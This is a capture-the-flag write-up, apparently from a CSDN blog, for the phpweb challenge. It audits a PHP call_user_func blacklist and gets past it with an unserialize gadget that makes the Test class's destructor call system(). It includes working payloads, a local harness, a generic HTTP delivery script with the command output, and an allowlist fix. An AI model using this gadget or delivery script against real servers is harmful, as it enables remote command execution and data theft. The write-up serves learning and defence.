1. phpweb - [网鼎杯 2020 朱雀组] - [Portal -> BUUCTF]
Step 1: click the portal link and open the challenge environment
Observe the challenge page:
//Watching the page, it reloads itself every few seconds, so it probably refreshes on a timer. The page shows a PHP warning that mentions the date() function.
//Intercept the request with Burp Suite to see what is going on. The page sends two parameters, func and p: func is date and p is a date format string, so the page is probably passing a function name and its argument to the backend.
//First try system() with an arbitrary command as the argument (using Burp's Repeater, which makes it easy to change parameters and inspect the response). The response is Hacker..., so the backend filters that function.
//Send the captured request to Repeater (Ctrl+R) and read the main page's source with any of:
//func=highlight_file&p=index.php
//func=file_get_contents&p=index.php
//func=readfile&p=index.php
While experimenting with the parameters an error message comes back that reveals the backend uses call_user_func()
//Callback: call_user_func()
//call_user_func is a PHP built-in that calls the function named by its first argument and passes the remaining arguments to it
//call_user_func($func, $p)
//$func: the function name
//$p: the argument
//$p is passed into $func as its argument, the function runs once and its return value is returned
Step 2: code audit
<?php
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
//Clearly a blacklist array $disable_fun. Note that the entry "registregister_shutdown_function" is misspelled, so register_shutdown_function itself is not actually on the list; unserialize is not on it either
function gettime($func, $p) { //user-defined gettime(), takes the two parameters $func and $p
$result = call_user_func($func, $p); //the callback: $func is the function name, $p its argument, and the return value is stored in $result. Nothing checks $func at this level
$a= gettype($result); //data type of $result
if ($a == "string") { //is it a string?
return $result; //if so, return the callback's result
} else {return "";} //otherwise return an empty string (anything the callback itself printed has already gone to the client)
}
class Test { //class Test
var $p = "Y-m-d h:i:s a"; //public property $p (var is the PHP 4 alias for public)
var $func = "date"; //public property $func
function __destruct() { //destructor: called automatically just before an instance of the class is destroyed
if ($this->func != "") { //loose comparison: true unless $func equals the empty string after type juggling
echo gettime($this->func, $this->p); //if so, call gettime() with the object's properties; there is no blacklist check on this path
}
}
}
//Clearly: if we can create an instance of Test, the $func property picks the function and $p the argument, and the destructor passes both to gettime() when the object is destroyed
//gettime() hands the two properties to call_user_func(); the callback runs regardless, and its result is returned only if it is a string
//So how do we create our own instance of the class and get it into the script???
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];
if ($func != null) {
$func = strtolower($func);
if (!in_array($func,$disable_fun)) {
echo gettime($func, $p);
}else {
die("Hacker...");
}
}
//Clearly: we control both parameters, and any function not on the blacklist reaches gettime(). But how do we get past the blacklist?
//The class can also reach gettime(). unserialize is not on the blacklist, so if we serialize the object analysed above and pass func=unserialize with the serialized string as p, the blacklist check passes; when the recreated object is destroyed its destructor fires and calls gettime() again, this time with the two properties we chose
?>
Step 3: approach
gettime() is called from two places: one behind the blacklist, the other (the destructor) without it
All we need is a way to have the function executed from the destructor, which has no blacklist
So:
Step 1: create an instance of the class whose properties hold the function and its argument
Step 2: serialize that object and submit the serialized string as p, with func set to unserialize
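To see the mechanism end to end, here is a local stand-in for the vulnerable handler (example code added for this writeup, not the challenge's own source). It keeps gettime(), Test and an abbreviated blacklist as analysed in Step 2, adds a handle() function that plays the role of the request handler (returning instead of die()ing so it can be called more than once), and shows three things: the direct system call is blocked, the unserialize route runs the chosen callback from __destruct before handle() even returns, and a shell callback's last line comes back twice. It ends with handleSafe(), an allowlist variant that is my addition and not part of the challenge.

```php
<?php
// Added example, not the challenge's own code: a local stand-in for the
// vulnerable endpoint. The blacklist is abbreviated; the real one is in Step 2.
// Run with: php harness.php
$disable_fun = ["exec", "shell_exec", "system", "passthru", "eval", "call_user_func"];

function gettime($func, $p) {
    $result = call_user_func($func, $p);   // no blacklist check at this level
    $a = gettype($result);
    return ($a == "string") ? $result : "";
}

class Test {
    var $p = "Y-m-d h:i:s a";
    var $func = "date";
    function __destruct() {
        // Fires when the last reference to the object disappears, i.e. when
        // gettime()'s local $result is released as gettime() returns.
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}

// Stand-in for the request handler (returns "Hacker..." instead of die()ing).
function handle(string $func, string $p): string {
    global $disable_fun;
    $func = strtolower($func);
    if (in_array($func, $disable_fun)) {
        return "Hacker...";
    }
    return gettime($func, $p);
}

// Build the gadget: a Test object whose properties choose callback and argument.
function gadget(string $func, string $p): string {
    $t = new Test();
    $t->func = $func;
    $t->p = $p;
    return serialize($t);
}

// 1. Calling system directly hits the blacklist.
echo handle("system", "id"), "\n";                       // Hacker...

// 2. unserialize is not on the list. The callback runs from __destruct before
//    handle() returns, while handle() itself returns "" because the value
//    unserialize() produced is an object, not a string.
$r = handle("unserialize", gadget("strtoupper", "destructor ran"));
echo "\nhandle() returned: [", $r, "]\n";                // DESTRUCTOR RAN, then []

// 3. With func=system the inner callback runs a shell command. system() writes
//    the command's output to stdout itself AND returns the last line, which the
//    destructor's echo prints a second time: hence the doubled last line.
handle("unserialize", gadget("system", "echo one; echo two"));
echo "\n";

// Hardened variant (my addition): an allowlist of the names the page actually
// needs replaces the blacklist, so unserialize, system and anything added to
// PHP later are rejected by default instead of having to be enumerated.
const ALLOWED_FUNCS = ["date" => "date"];
function handleSafe(string $func, string $p): string {
    $func = strtolower($func);
    if (!isset(ALLOWED_FUNCS[$func])) {
        return "Hacker...";
    }
    return gettime(ALLOWED_FUNCS[$func], $p);
}
echo handleSafe("unserialize", gadget("system", "id")), "\n";   // Hacker...
```

Run it with php from the command line. Where unserialize() on user input cannot be avoided at all, a second independent mitigation is unserialize($p, ['allowed_classes' => false]) (PHP 7 and later), which turns every object in the string into __PHP_Incomplete_Class so no real class's destructor can fire.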
Step 4: write code to build the payload
<?php
class Test {
var $p;
var $func;
}
$chen = new Test();
#$chen->p = 'ls -la'; //list the files in the current directory
#$chen->p = "find / -name 'flag'*"; //look for the flag file
$chen->p = "cat /tmp/flagoefiu4r93"; //read the flag file
$chen->func = 'system';
$chen = serialize($chen);
echo $chen."<br />";
//O:4:"Test":2:{s:1:"p";s:6:"ls -la";s:4:"func";s:6:"system";}
//O:4:"Test":2:{s:1:"p";s:20:"find / -name 'flag'*";s:4:"func";s:6:"system";}
//O:4:"Test":2:{s:1:"p";s:22:"cat /tmp/flagoefiu4r93";s:4:"func";s:6:"system";}
payload1:
?func=unserialize&p=O:4:"Test":2:{s:1:"p";s:6:"ls -la";s:4:"func";s:6:"system";}
payload2:
?func=unserialize&p=O:4:"Test":2:{s:1:"p";s:20:"find / -name 'flag'*";s:4:"func";s:6:"system";}
payload3:
?func=unserialize&p=O:4:"Test":2:{s:1:"p";s:22:"cat /tmp/flagoefiu4r93";s:4:"func";s:6:"system";}
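The payloads above are pasted into the address bar as raw query strings; that works here because the browser percent-encodes the spaces and quotes, but a command containing +, & or # would be mangled. Here is a small delivery script added for this writeup (not the original post's code) that builds the same gadget with serialize(), form-encodes it and sends it as a POST, which $_REQUEST accepts just like GET. The target URL is an assumption: pass the real challenge instance as the first argument.

```php
<?php
// Added example, not from the original post: build the Test gadget and deliver
// it to the challenge over HTTP.
// Usage: php deliver.php <url> [command]      (url is an assumption)
class Test {
    var $p;
    var $func;
}

function buildGadget(string $cmd, string $func = "system"): string {
    $t = new Test();
    $t->func = $func;
    $t->p = $cmd;
    // serialize() writes the s:N:"..." byte lengths itself, so a command with
    // quotes or multibyte characters cannot end up with a wrong N.
    return serialize($t);
}

function deliver(string $url, string $cmd): string {
    // POST rather than GET: $_REQUEST reads both, and form encoding keeps shell
    // metacharacters such as +, & and # intact.
    $body = http_build_query(["func" => "unserialize", "p" => buildGadget($cmd)]);
    $ctx = stream_context_create(["http" => [
        "method"        => "POST",
        "header"        => "Content-Type: application/x-www-form-urlencoded\r\n",
        "content"       => $body,
        "ignore_errors" => true,   // hand back the body even on a non-2xx status
        "timeout"       => 10,
    ]]);
    $resp = @file_get_contents($url, false, $ctx);
    return $resp === false ? "" : $resp;
}

$url = $argv[1] ?? "http://127.0.0.1/index.php";   // assumption: a local instance
$cmd = $argv[2] ?? "ls -la";
echo deliver($url, $cmd);
```

The response body contains the command output as printed by system() followed by its last line once more (the destructor echoes gettime()'s return value), so strip the trailing repeat if you post-process the output. file_get_contents() over http needs allow_url_fopen, which is on by default.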
Step 5: submit the payloads and get the flag
(In each response below the last line of the command output appears twice. system() writes the command's output straight to stdout and also returns its last line as a string; the destructor's echo gettime(...) prints that returned line a second time.)
Submit payload1:
total 88
drwxr-xr-x 1 root root 37 May 17 2020 .
drwxr-xr-x 1 root root 18 Aug 10 2016 ..
-rw-r--r-- 1 root root 82910 May 17 2020 bg.jpg
-rw-r--r-- 1 root root 1770 May 17 2020 index.php
-rw-r--r-- 1 root root 1770 May 17 2020 index.php
Submit payload2:
/proc/sys/kernel/sched_domain/cpu0/domain0/flags
/proc/sys/kernel/sched_domain/cpu1/domain0/flags
/proc/sys/kernel/sched_domain/cpu10/domain0/flags
/proc/sys/kernel/sched_domain/cpu11/domain0/flags
/proc/sys/kernel/sched_domain/cpu12/domain0/flags
/proc/sys/kernel/sched_domain/cpu13/domain0/flags
/proc/sys/kernel/sched_domain/cpu14/domain0/flags
/proc/sys/kernel/sched_domain/cpu15/domain0/flags
/proc/sys/kernel/sched_domain/cpu2/domain0/flags
/proc/sys/kernel/sched_domain/cpu3/domain0/flags
/proc/sys/kernel/sched_domain/cpu4/domain0/flags
/proc/sys/kernel/sched_domain/cpu5/domain0/flags
/proc/sys/kernel/sched_domain/cpu6/domain0/flags
/proc/sys/kernel/sched_domain/cpu7/domain0/flags
/proc/sys/kernel/sched_domain/cpu8/domain0/flags
/proc/sys/kernel/sched_domain/cpu9/domain0/flags
/sys/devices/pnp0/00:04/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS15/flags
/sys/devices/platform/serial8250/tty/ttyS6/flags
/sys/devices/platform/serial8250/tty/ttyS23/flags
/sys/devices/platform/serial8250/tty/ttyS13/flags
/sys/devices/platform/serial8250/tty/ttyS31/flags
/sys/devices/platform/serial8250/tty/ttyS4/flags
/sys/devices/platform/serial8250/tty/ttyS21/flags
/sys/devices/platform/serial8250/tty/ttyS11/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS28/flags
/sys/devices/platform/serial8250/tty/ttyS18/flags
/sys/devices/platform/serial8250/tty/ttyS9/flags
/sys/devices/platform/serial8250/tty/ttyS26/flags
/sys/devices/platform/serial8250/tty/ttyS16/flags
/sys/devices/platform/serial8250/tty/ttyS7/flags
/sys/devices/platform/serial8250/tty/ttyS24/flags
/sys/devices/platform/serial8250/tty/ttyS14/flags
/sys/devices/platform/serial8250/tty/ttyS5/flags
/sys/devices/platform/serial8250/tty/ttyS22/flags
/sys/devices/platform/serial8250/tty/ttyS12/flags
/sys/devices/platform/serial8250/tty/ttyS30/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/devices/platform/serial8250/tty/ttyS20/flags
/sys/devices/platform/serial8250/tty/ttyS10/flags
/sys/devices/platform/serial8250/tty/ttyS29/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/platform/serial8250/tty/ttyS19/flags
/sys/devices/platform/serial8250/tty/ttyS27/flags
/sys/devices/platform/serial8250/tty/ttyS17/flags
/sys/devices/platform/serial8250/tty/ttyS8/flags
/sys/devices/platform/serial8250/tty/ttyS25/flags
/sys/devices/virtual/net/eth0/flags
/sys/devices/virtual/net/eth1/flags
/sys/devices/virtual/net/lo/flags
/tmp/flagoefiu4r93
/tmp/flagoefiu4r93
Submit payload3:
flag{06a7c1f8-1e07-40c4-91f9-2f6b21a6747c} flag{06a7c1f8-1e07-40c4-91f9-2f6b21a6747c}
Source: https://blog.csdn.net/qq_45555226/article/details/110002935